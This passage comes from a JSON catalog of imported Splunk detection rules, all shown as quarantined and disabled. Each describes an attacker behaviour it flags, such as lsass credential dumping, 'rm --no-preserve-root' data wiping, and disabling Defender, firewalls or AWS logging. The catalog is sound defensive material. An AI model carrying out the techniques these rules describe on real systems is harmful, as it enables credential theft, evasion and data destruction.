"splunk-security-content-b0ce5521-2533-4f24-b8d5-c2ff977aae08", "type": "detection", "name": "Cisco SNMP Community String Configuration Changes", "description": "This analytic detects changes to SNMP community strings on Cisco devices, which could indicate an attacker establishing persistence or attempting to extract credentials. After gaining initial access to network devices, threat actors like Static Tundra often modify SNMP configurations to enable unauthorized monitoring and data collection. This detection specifically looks for the configuration of SNMP community strings with read-write (rw) or read-only (ro) permissions, as well as the configuration of SNMP hosts that may be used to exfiltrate data. These activities are particularly concerning as they may represent attempts to establish persistent access or extract sensitive information from compromised devices.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001", "T1040", "T1552" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-snmp-community-string-configuration-changes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b0ce5521-2533-4f24-b8d5-c2ff977aae08", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_snmp_community_string_configuration_changes.yml" } }, { "id": "splunk-security-content-b0fd38c7-f71a-43a2-870e-f3ca06bcdd99", "type": "detection", "name": "Windows HTTP Network Communication From MSIExec", "description": "The following analytic detects MSIExec making network connections over ports 443 or 80. This behavior is identified by correlating process creation events from Endpoint Detection and Response (EDR) agents with network traffic logs. Typically, MSIExec does not perform network communication to the internet, making this activity unusual and potentially indicative of malicious behavior. If confirmed malicious, an attacker could be using MSIExec to download or communicate with external servers, potentially leading to data exfiltration, command and control (C2) communication, or further malware deployment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-http-network-communication-from-msiexec.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b0fd38c7-f71a-43a2-870e-f3ca06bcdd99", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_http_network_communication_from_msiexec.yml" } }, { "id": "splunk-security-content-b11bb510-97e1-4b7a-b673-887ab228c280", "type": "detection", "name": "Windows Set Network Profile Category to Private via Registry", "description": "The following analytic detects attempts to modify the Windows Registry to change a network profile's category to \"Private\", which may indicate an adversary is preparing the environment for lateral movement or reducing firewall restrictions. Specifically, this activity involves changes to the Category value within the HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Profiles\\{GUID} registry path. A value of 1 corresponds to a private network profile, which typically enables less restrictive firewall policies. While this action can occur during legitimate network configuration, it may also be a sign of malicious behavior when combined with other indicators such as suspicious account activity, unexpected administrative privilege usage, or execution of unsigned binaries. Monitoring for this registry modification\u2014especially outside standard IT processes or correlated with persistence mechanisms\u2014can help identify stealthy post-exploitation activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-set-network-profile-category-to-private-via-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b11bb510-97e1-4b7a-b673-887ab228c280", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_set_network_profile_category_to_private_via_registry.yml" } }, { "id": "splunk-security-content-b11d3979-b2f7-411b-bb1a-bd00e642173b", "type": "detection", "name": "Linux Data Destruction Command", "description": "The following analytic detects the execution of a Unix shell command designed to wipe root directories on a Linux host. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on the 'rm' command with force recursive deletion and the '--no-preserve-root' option. This activity is significant as it indicates potential data destruction attempts, often associated with malware like Awfulshred. If confirmed malicious, this behavior could lead to severe data loss, system instability, and compromised integrity of the affected Linux host. Immediate investigation and response are crucial to mitigate potential damage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-data-destruction-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b11d3979-b2f7-411b-bb1a-bd00e642173b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_data_destruction_command.yml" } }, { "id": "splunk-security-content-b188d11a-eba7-419d-b8b6-cc265b4f2c4f", "type": "detection", "name": "Windows Delete or Modify System Firewall", "description": "The following analytic identifies 'netsh' processes that delete or modify firewall configurations. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions containing specific keywords. This activity is significant because it can indicate malware, such as NJRAT, attempting to alter firewall settings to evade detection or remove traces. If confirmed malicious, this behavior could allow an attacker to disable security measures, facilitating further compromise and persistence within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-delete-or-modify-system-firewall.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b188d11a-eba7-419d-b8b6-cc265b4f2c4f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_delete_or_modify_system_firewall.yml" } }, { "id": "splunk-security-content-b1a82fc8-8a9f-4344-9ec2-bde5c5331b57", "type": "detection", "name": "Detect Distributed Password Spray Attempts", "description": "This analytic employs the 3-sigma approach to identify distributed password spray attacks. A distributed password spray attack is a type of brute force attack where the attacker attempts a few common passwords against many different accounts, connecting from multiple IP addresses to avoid detection. By utilizing the Authentication Data Model, this detection is effective for all CIM-mapped authentication events, providing comprehensive coverage and enhancing security against these attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-distributed-password-spray-attempts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b1a82fc8-8a9f-4344-9ec2-bde5c5331b57", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/detect_distributed_password_spray_attempts.yml" } }, { "id": "splunk-security-content-b1a8ce04-04c2-11ec-bea7-acde48001122", "type": "detection", "name": "Domain Account Discovery with Dsquery", "description": "The following analytic identifies the execution of `dsquery.exe` with command-line arguments used to discover domain users. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as it indicates potential reconnaissance efforts by adversaries to map out domain users, which is a common precursor to further attacks. If confirmed malicious, this behavior could allow attackers to gain insights into user accounts, facilitating subsequent actions like privilege escalation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/domain-account-discovery-with-dsquery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b1a8ce04-04c2-11ec-bea7-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/domain_account_discovery_with_dsquery.yml" } }, { "id": "splunk-security-content-b1b1e316-accc-11eb-a9b4-acde48001122", "type": "detection", "name": "ICACLS Grant Command", "description": "The following analytic detects the use of the ICACLS command to grant\nadditional access permissions to files or directories. It leverages data from Endpoint\nDetection and Response (EDR) agents, focusing on specific process names and command-line\narguments. This activity is significant because it is commonly used by Advanced\nPersistent Threats (APTs) and coinminer scripts to evade detection and maintain\ncontrol over compromised systems. If confirmed malicious, this behavior could allow\nattackers to manipulate file permissions, potentially leading to unauthorized access,\ndata exfiltration, or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/icacls-grant-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b1b1e316-accc-11eb-a9b4-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/icacls_grant_command.yml" } }, { "id": "splunk-security-content-b1ce9a72-73cf-11ec-981b-acde48001122", "type": "detection", "name": "Windows Non-System Account Targeting Lsass", "description": "The following analytic identifies non-SYSTEM accounts requesting access to lsass.exe. This detection leverages Sysmon EventCode 10 logs to monitor access attempts to the Local Security Authority Subsystem Service (lsass.exe) by non-SYSTEM users. This activity is significant as it may indicate credential dumping attempts or unauthorized access to sensitive credentials. If confirmed malicious, an attacker could potentially extract credentials from memory, leading to privilege escalation or lateral movement within the network. Immediate investigation is required to determine the legitimacy of the access request and to mitigate any potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-non-system-account-targeting-lsass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b1ce9a72-73cf-11ec-981b-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_non_system_account_targeting_lsass.yml" } }, { "id": "splunk-security-content-b1ea79da-719c-437c-acaf-5c93f838f425", "type": "detection", "name": "Windows DNS Query Request To TinyUrl", "description": "The following analytic detects a process located in a potentially suspicious location making DNS queries to known URL shortening services, specifically tinyurl.\nURL shorteners are frequently used by threat actors to obfuscate malicious destinations, including phishing pages, malware distribution sites, or command-and-control (C2) endpoints.\nWhile tinyurl.com is a legitimate service, its use in enterprise environments\u2014particularly by non-browser processes or scripts\u2014should be considered suspicious, especially if correlated with subsequent outbound connections, file downloads, process file path or credential prompts. Analysts should investigate the source process, execution context, and destination domain to determine intent and risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-dns-query-request-to-tinyurl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b1ea79da-719c-437c-acaf-5c93f838f425", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_dns_query_request_to_tinyurl.yml" } }, { "id": "splunk-security-content-b2215bfb-6171-4137-af17-1a02fdd8d043", "type": "detection", "name": "Windows Impair Defense Disable Defender Protocol Recognition", "description": "The following analytic detects modifications to the Windows registry that disable the Windows Defender protocol recognition feature. It leverages data from the Endpoint.Registry data model, specifically looking for changes to the \"DisableProtocolRecognition\" setting. This activity is significant because disabling protocol recognition can hinder Windows Defender's ability to detect and respond to malware or suspicious software. If confirmed malicious, this action could allow an attacker to bypass antivirus defenses, facilitating further malicious activities such as data exfiltration or system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-disable-defender-protocol-recognition.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b2215bfb-6171-4137-af17-1a02fdd8d043", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_disable_defender_protocol_recognition.yml" } }, { "id": "splunk-security-content-b2442e49-bd3f-4685-a2dc-2bdc292563bf", "type": "detection", "name": "Windows MpCmdRun RemoveDefinitions Execution", "description": "This detection identifies the execution of MpCmdRun.exe with the \"-RemoveDefinitions\" argument, which is used to remove definitions from the Windows Malware Protection Engine.\nThis behavior can be significant as it might indicate potential malware activity or attempts to bypass security measures.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-mpcmdrun-removedefinitions-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b2442e49-bd3f-4685-a2dc-2bdc292563bf", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_mpcmdrun_removedefinitions_execution.yml" } }, { "id": "splunk-security-content-b25f6f62-0712-43c1-b203-083231ffd97d", "type": "detection", "name": "Detect New Local Admin account", "description": "The following analytic detects the creation of new accounts elevated to local administrators. It uses Windows event logs, specifically EventCode 4720 (user account creation) and EventCode 4732 (user added to Administrators group). This activity is significant as it indicates potential unauthorized privilege escalation, which is critical for SOC monitoring. If confirmed malicious, this could allow attackers to gain administrative access, leading to unauthorized data access, system modifications, and disruption of services. Immediate investigation is required to mitigate risks and prevent further unauthorized actions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-new-local-admin-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b25f6f62-0712-43c1-b203-083231ffd97d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_new_local_admin_account.yml" } }, { "id": "splunk-security-content-b25f6f62-0782-43c1-b403-083231ffd97d", "type": "detection", "name": "Short Lived Windows Accounts", "description": "The following analytic detects the rapid creation and deletion of Windows accounts within a short time frame of 1 hour. It leverages the \"Change\" data model in Splunk, specifically monitoring events with result IDs 4720 (account creation) and 4726 (account deletion). This behavior is significant as it may indicate an attacker attempting to create and remove accounts quickly to evade detection or gain unauthorized access. If confirmed malicious, this activity could lead to unauthorized access, privilege escalation, or further malicious actions within the environment. Immediate investigation of flagged events is crucial to mitigate potential damage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.003", "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/short-lived-windows-accounts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b25f6f62-0782-43c1-b403-083231ffd97d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/short_lived_windows_accounts.yml" } }, { "id": "splunk-security-content-b27685a2-8826-4123-ab78-2d9d0d419ed0", "type": "detection", "name": "GitHub Enterprise Register Self Hosted Runner", "description": "The following analytic identifies when a self-hosted runner is created in GitHub Enterprise. The detection monitors GitHub Enterprise audit logs for actions related to creating new self-hosted runners at the organization or enterprise level. his behavior warrants monitoring because self-hosted runners execute workflow jobs on customer-controlled infrastructure, which could be exploited by attackers to execute malicious code, access sensitive data, or pivot to other systems. While self-hosted runners are a legitimate feature, their creation should be carefully controlled as compromised runners pose significant security risks. The impact includes potential remote code execution, data exfiltration, and lateral movement within the environment if a runner is compromised. SOC teams should investigate unexpected runner creation events to verify they are authorized and properly secured, especially if created by unfamiliar users or in unusual contexts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-enterprise-register-self-hosted-runner.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b27685a2-8826-4123-ab78-2d9d0d419ed0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_enterprise_register_self_hosted_runner.yml" } }, { "id": "splunk-security-content-b27f20bd-ef20-41d1-a1e9-25dedd5bf2f5", "type": "detection", "name": "Windows Modify Registry ProxyEnable", "description": "The following analytic detects modifications to the Windows registry key \"ProxyEnable\" to enable proxy settings. It leverages data from the Endpoint.Registry datamodel, specifically monitoring changes to the \"Internet Settings\\ProxyEnable\" registry path. This activity is significant as it is commonly exploited by malware and adversaries to establish proxy communication, potentially connecting to malicious Command and Control (C2) servers. If confirmed malicious, this could allow attackers to redirect network traffic through a proxy, facilitating unauthorized communication and data exfiltration, thereby compromising the security of the affected host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-proxyenable.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b27f20bd-ef20-41d1-a1e9-25dedd5bf2f5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_proxyenable.yml" } }, { "id": "splunk-security-content-b28c4957-96a6-47e0-a965-6c767aac1458", "type": "detection", "name": "AWS Defense Evasion Impair Security Services", "description": "The following analytic detects attempts to impair or disable AWS security services by monitoring specific deletion operations across GuardDuty, AWS WAF (classic and v2), CloudWatch, Route 53, and CloudWatch Logs. These actions include deleting detectors, rule groups, IP sets, web ACLs, logging configurations, alarms, and log streams. Adversaries may perform such operations to evade detection or remove visibility from defenders. By explicitly pairing eventName values with their corresponding eventSource services, this detection reduces noise and ensures that only security-related deletions are flagged. It leverages CloudTrail logs to identify specific API calls like \"DeleteLogStream\" and \"DeleteDetector.\" This activity is significant because it indicates potential efforts to disable security monitoring and evade detection. If confirmed malicious, this could allow attackers to operate undetected, escalate privileges, or exfiltrate data without triggering security alerts, severely compromising the security posture of the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-defense-evasion-impair-security-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b28c4957-96a6-47e0-a965-6c767aac1458", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_defense_evasion_impair_security_services.yml" } }, { "id": "splunk-security-content-b2c81cc6-6040-11eb-ae93-0242ac130002", "type": "detection", "name": "O365 Add App Role Assignment Grant User", "description": "The following analytic detects the addition of an application role assignment grant to a user in Office 365. It leverages data from the `o365_management_activity` dataset, specifically monitoring the \"Add app role assignment grant to user\" operation. This activity is significant as it can indicate unauthorized privilege escalation or the assignment of sensitive roles to users. If confirmed malicious, this could allow an attacker to gain elevated permissions, potentially leading to unauthorized access to critical resources and data within the Office 365 environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-add-app-role-assignment-grant-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b2c81cc6-6040-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_add_app_role_assignment_grant_user.yml" } }, { "id": "splunk-security-content-b2cc69e7-11ba-42dc-a269-59c069a48870", "type": "detection", "name": "Windows System Time Discovery W32tm Delay", "description": "The following analytic identifies the use of the w32tm.exe utility with the /stripchart function, which is indicative of DCRat malware delaying its payload execution. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific command-line arguments used by w32tm.exe. This activity is significant as it may indicate an attempt to evade detection by delaying malicious actions such as C2 communication and beaconing. If confirmed malicious, this behavior could allow an attacker to maintain persistence and execute further malicious activities undetected.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1124" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-system-time-discovery-w32tm-delay.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b2cc69e7-11ba-42dc-a269-59c069a48870", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_system_time_discovery_w32tm_delay.yml" } }, { "id": "splunk-security-content-b2ea1f38-3a3e-4b8a-9cf1-82760d86a6b8", "type": "detection", "name": "Monitor Email For Brand Abuse", "description": "The following analytic identifies emails claiming to be sent from a domain similar to one you are monitoring for potential abuse. It leverages email header data, specifically the sender's address, and cross-references it with a lookup table of known domain permutations generated by the \"ESCU - DNSTwist Domain Names\" search. This activity is significant as it can indicate phishing attempts or brand impersonation, which are common tactics used in social engineering attacks. If confirmed malicious, this could lead to unauthorized access, data theft, or reputational damage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/monitor-email-for-brand-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b2ea1f38-3a3e-4b8a-9cf1-82760d86a6b8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/monitor_email_for_brand_abuse.yml" } }, { "id": "splunk-security-content-b2fb6830-9ed1-11ec-9fcb-acde48001122", "type": "detection", "name": "Windows Disable LogOff Button Through Registry", "description": "The following analytic detects a suspicious registry modification that disables the logoff feature on a Windows host. It leverages data from the Endpoint.Registry data model to identify changes to specific registry values associated with logoff functionality. This activity is significant because it can indicate ransomware attempting to make the compromised host unusable and hinder remediation efforts. If confirmed malicious, this action could prevent users from logging off, complicate incident response, and allow attackers to maintain persistence and control over the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-disable-logoff-button-through-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b2fb6830-9ed1-11ec-9fcb-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_disable_logoff_button_through_registry.yml" } }, { "id": "splunk-security-content-b2fbe95a-9c62-4c12-8a29-24b97e84c0cd", "type": "detection", "name": "Creation of lsass Dump with Taskmgr", "description": "The following analytic detects the creation of an lsass.exe process dump using Windows Task Manager. It leverages Sysmon EventID 11 to identify file creation events where the target filename matches *lsass*.dmp. This activity is significant because creating an lsass dump can be a precursor to credential theft, as the dump file contains sensitive information such as user passwords. If confirmed malicious, an attacker could use the lsass dump to extract credentials and escalate privileges, potentially compromising the entire network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/creation-of-lsass-dump-with-taskmgr.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b2fbe95a-9c62-4c12-8a29-24b97e84c0cd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/creation_of_lsass_dump_with_taskmgr.yml" } }, { "id": "splunk-security-content-b3424bbe-3204-4469-887b-ec144483a336", "type": "detection", "name": "ASL AWS Concurrent Sessions From Different Ips", "description": "The following analytic identifies an AWS IAM account with concurrent sessions originating from more than one unique IP address within a 5-minute span. This detection leverages AWS CloudTrail logs, specifically the `DescribeEventAggregates` API call, to identify multiple IP addresses associated with the same user session. This behavior is significant as it may indicate a session hijacking attack, where an adversary uses stolen session cookies to access AWS resources from a different location. If confirmed malicious, this activity could allow unauthorized access to sensitive corporate resources, leading to potential data breaches or further exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1185" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-concurrent-sessions-from-different-ips.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b3424bbe-3204-4469-887b-ec144483a336", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_concurrent_sessions_from_different_ips.yml" } }, { "id": "splunk-security-content-b34bcf35-5380-4b00-b208-5531303fb751", "type": "detection", "name": "Windows Hosts File Access", "description": "This Analytic detects the execution of a process attempting to access the hosts file.\nThe hosts file is a critical file for network configuration and DNS resolution.\nIf an attacker gains access to it, they can redirect traffic to malicious websites, serve fake content or block legitimate security websites.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-hosts-file-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b34bcf35-5380-4b00-b208-5531303fb751", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": 